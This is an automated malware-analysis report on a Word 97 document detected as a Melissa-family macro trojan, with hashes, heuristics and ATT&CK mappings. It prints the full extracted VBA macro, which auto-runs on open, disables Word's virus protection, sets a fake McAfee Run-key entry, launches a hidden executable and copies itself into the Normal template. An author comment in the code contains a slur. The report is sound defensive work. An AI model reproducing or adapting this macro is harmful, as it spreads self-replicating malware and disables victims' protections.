Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18ec97f10602be1e…

MALICIOUS

Office (OLE)

34.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 19ba3d4a90de72e05786c4dffcad5f54 SHA-1: 2ac9d388be2da5f1f8d53c6b5eaba14cbb12e248 SHA-256: 18ec97f10602be1eda1387d66fb0961ceba247f769f8b7695392e867cc6cd4a8
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro that executes upon opening the document. This macro attempts to copy a file from 'a:\msdos.bak' to 'c:\windows\system\vshield.exe' and then execute it. It also attempts to add an entry to the Run key for persistence. The ClamAV detection 'Doc.Trojan.Melissa-25' strongly suggests a known malicious family, but specific attribution is not possible from the provided evidence.

Heuristics 5

  • ClamAV: Doc.Trojan.Melissa-25 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Melissa-25
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6880 bytes
SHA-256: 148758c8df5efd9acbbf5bf9137c213bd23336c023d42bb287998e90d4915921
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "money99"
Attribute VB_Base = "1Normal.money99"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Dim source, dest

CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)

If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Mcafee VShield") <> "c:\windows\system\vshield.exe" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Mcafee VShield") = "c:\windows\system\vshield.exe"

source = "a:\msdos.bak"
dest = "c:\windows\system\vshield.exe"
FileCopy source, dest
SetAttr dest, vbHidden
Shell dest

Else

source = "c:\windows\system\vshield.exe"
dest = "a:\msdos.bak"
FileCopy source, dest
SetAttr dest, vbHidden
End If

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

NTlnCnt = NT.CodeModule.CountOfLines
ADlnCnt = AD.CodeModule.CountOfLines
Start = 1

If NT.Name <> "money99" Then
    If NTlnCnt > 0 Then NT.CodeModule.DeleteLines 1, NTlnCnt
    NT.Name = "money99"
    
    Do While AD.CodeModule.Lines(Start, 1) <> "'Done"
        NT.CodeModule.InsertLines Start, AD.CodeModule.Lines(Start, 1)
        Start = Start + 1
    Loop
    NT.CodeModule.InsertLines NT.CodeModule.CountOfLines + 1, "'Done"
    
ElseIf AD.Name <> "money99" Then
    If ADlnCnt > 0 Then AD.CodeModule.DeleteLines 1, ADlnCnt
    AD.Name = "money99"
    
    Do While NT.CodeModule.Lines(Start, 1) <> "'Done"
        AD.CodeModule.InsertLines Start, NT.CodeModule.Lines(Start, 1)
        Start = Start + 1
    Loop
    AD.CodeModule.InsertLines AD.CodeModule.CountOfLines + 1, "'Done"
End If

End Sub
'Mcafee blows; mail suggestions/improvements to anon15773@hushmail.com
'Shout out to ma nigga Sketch
'Done

' Processing file: /opt/analyzer/scan_staging/b290ff877cb2429982d8d9e649ab3753.bin
' ===============================================================================
' Module streams:
' Macros/VBA/money99 - 3931 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn source
' 	VarDefn dest
' Line #3:
' Line #4:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #5:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' Line #7:
' 	LitStr 0x0000 ""
' 	LitStr 0x0040 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
' 	LitStr 0x000E "Mcafee VShield"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	Ne 
' 	IfBlock 
' Line #8:
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	LitStr 0x0000 ""
' 	LitStr 0x0040 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
' 	LitStr 0x000E "Mcafee VShield"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #9:
' Line #10:
' 	LitStr 0x000C "a:\msdos.bak"
' 	St source 
' Line #11:
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	St dest 
' Line #12:
' 	Ld source 
' 	Ld dest 
' 	ArgsCall FileCopy 0x0002 
' Line #13:
' 	Ld dest 
' 	Ld vbHidden 
' 	ArgsCall SetAttr 0x0002 
' Line #14:
' 	Ld dest 
' 	ArgsCall Shell 0x0001 
' Line #15:
' Line #16:
' 	ElseBlock 
' Line #17:
' Line #18:
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	St source 
' Line #19:
' 	LitStr 0x000C "a:\msdos.bak"
' 	St dest 
' Line #20:
' 	Ld source 
' 	Ld dest 
' 	ArgsCall FileCopy 0x0002 
' Line #21:
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.